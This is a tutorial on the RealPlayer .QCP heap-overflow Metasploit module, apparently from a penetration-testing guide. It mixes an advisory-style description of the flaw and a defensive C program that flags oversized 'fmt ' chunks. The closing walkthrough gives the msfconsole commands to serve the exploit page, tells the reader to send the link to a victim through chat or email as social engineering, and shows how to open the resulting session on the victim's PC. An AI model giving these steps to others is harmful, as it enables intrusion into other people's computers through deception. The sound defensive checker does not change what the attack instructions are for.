This module exploits a heap overflow in RealPlayer when handling a .QCP file. The specific flaw exists within qcpfformat.dll: a fixed 256-byte buffer is allocated on the heap, and user-supplied data from the file is copied into it inside a memory copy loop without a length check. This allows a remote attacker to execute arbitrary code in the context of the web browser via a .QCP file with a specially crafted "fmt" chunk. At this moment the module exploits the flaw on Windows XP with IE6 and IE7.
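The bug class described above (a file-controlled chunk length copied into a fixed 256-byte buffer) is easy to check for before a file ever reaches the player. The following C program is an added example, not code from the module or from RealPlayer; it assumes the .QCP container is RIFF-style (a "RIFF" header, a "QLCM" form type, then chunks of 4-byte id plus 4-byte little-endian length, word-aligned), and it flags any "fmt " chunk whose declared length exceeds the 256-byte buffer or runs past the end of the file. The `copy_fmt_chunk` helper shows the bounded copy that the vulnerable loop lacked; the sample file bytes are constructed in memory for the demonstration.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Size of the fixed buffer the advisory text describes. */
#define FMT_BUF_SIZE 256

/* Verdicts returned by check_qcp(). */
enum qcp_check {
    QCP_OK = 0,
    QCP_BAD_HEADER = 1,
    QCP_TRUNCATED = 2,
    QCP_FMT_OVERSIZED = 3
};

/* Little-endian 32-bit read/write helpers. */
static uint32_t rd32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}
static void wr32(uint8_t *p, uint32_t v) {
    p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8);
    p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}

/* Bounded copy of a chunk payload into the fixed buffer. The vulnerable
 * loop copied `len` bytes unconditionally; here a payload longer than the
 * buffer is rejected outright rather than truncated or overflowed. */
static int copy_fmt_chunk(uint8_t dst[FMT_BUF_SIZE], const uint8_t *src, uint32_t len) {
    if (len > FMT_BUF_SIZE)
        return 0;
    memcpy(dst, src, len);
    return 1;
}

/* Walk the chunk list (assumed RIFF/QLCM layout) and report the first
 * structural problem found. The 256-byte buffer lives on the stack here;
 * the check is the same whether it is stack- or heap-allocated. */
int check_qcp(const uint8_t *buf, size_t n) {
    if (n < 12 || memcmp(buf, "RIFF", 4) != 0 || memcmp(buf + 8, "QLCM", 4) != 0)
        return QCP_BAD_HEADER;
    size_t off = 12;
    while (off + 8 <= n) {
        uint32_t clen = rd32(buf + off + 4);
        if (clen > n - off - 8)            /* declared length runs past EOF */
            return QCP_TRUNCATED;
        if (memcmp(buf + off, "fmt ", 4) == 0) {
            uint8_t fmt[FMT_BUF_SIZE];
            if (!copy_fmt_chunk(fmt, buf + off + 8, clen))
                return QCP_FMT_OVERSIZED;
        }
        off += 8 + clen + (clen & 1);      /* RIFF chunks are word-aligned */
    }
    return QCP_OK;
}

/* Build a constructed in-memory sample: header plus a single "fmt " chunk
 * whose payload is fmt_len bytes of 'A'. Returns total size, 0 if it
 * would not fit in `cap` bytes. */
size_t build_sample(uint8_t *out, size_t cap, uint32_t fmt_len) {
    size_t total = 12 + 8 + (size_t)fmt_len;
    if (total > cap)
        return 0;
    memcpy(out, "RIFF", 4);
    wr32(out + 4, (uint32_t)(total - 8));
    memcpy(out + 8, "QLCM", 4);
    memcpy(out + 12, "fmt ", 4);
    wr32(out + 16, fmt_len);
    memset(out + 20, 'A', fmt_len);
    return total;
}

int main(void) {
    uint8_t file[1024];
    size_t n = build_sample(file, sizeof file, 36);
    printf("36-byte fmt chunk  -> verdict %d\n", check_qcp(file, n));   /* 0 = QCP_OK */
    n = build_sample(file, sizeof file, 600);
    printf("600-byte fmt chunk -> verdict %d\n", check_qcp(file, n));   /* 3 = QCP_FMT_OVERSIZED */
    return 0;
}
```

A file that trips `QCP_FMT_OVERSIZED` or `QCP_TRUNCATED` is not necessarily an exploit, but it is exactly the malformed input a fuzzer or a crafted sample would present, so the check makes a reasonable pre-filter at a mail gateway or in a sandbox triage script.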
RealPlayer 11.0 – 11.1
RealPlayer SP 1.0 – 1.1.5
RealPlayer 14.0.0 – 14.0.5
Internet Explorer 7.0.5730.13
Apple RealPlayer 22.214.171.1243
Attacker: BackTrack 5
Victim PC: Windows XP
Open a BackTrack terminal and type msfconsole.
Now type use exploit/windows/browser/realplayer_qcp
msf exploit(realplayer_qcp) > set SRVHOST 192.168.1.4 (this must be an address on the local machine)
msf exploit(realplayer_qcp) > set URIPATH realplayer (the URL path to use for this exploit)
msf exploit(realplayer_qcp) > exploit
The module now serves the page at http://192.168.1.4:8080/realplayer; this is the URL you give to the victim.
Send the link to the victim via chat, email or any other social engineering technique.
Once the victim's browser has been exploited, you have a session on the victim's PC. Type "sessions -l" to list sessions and their numbers, then "sessions -i ID" to interact with the chosen session.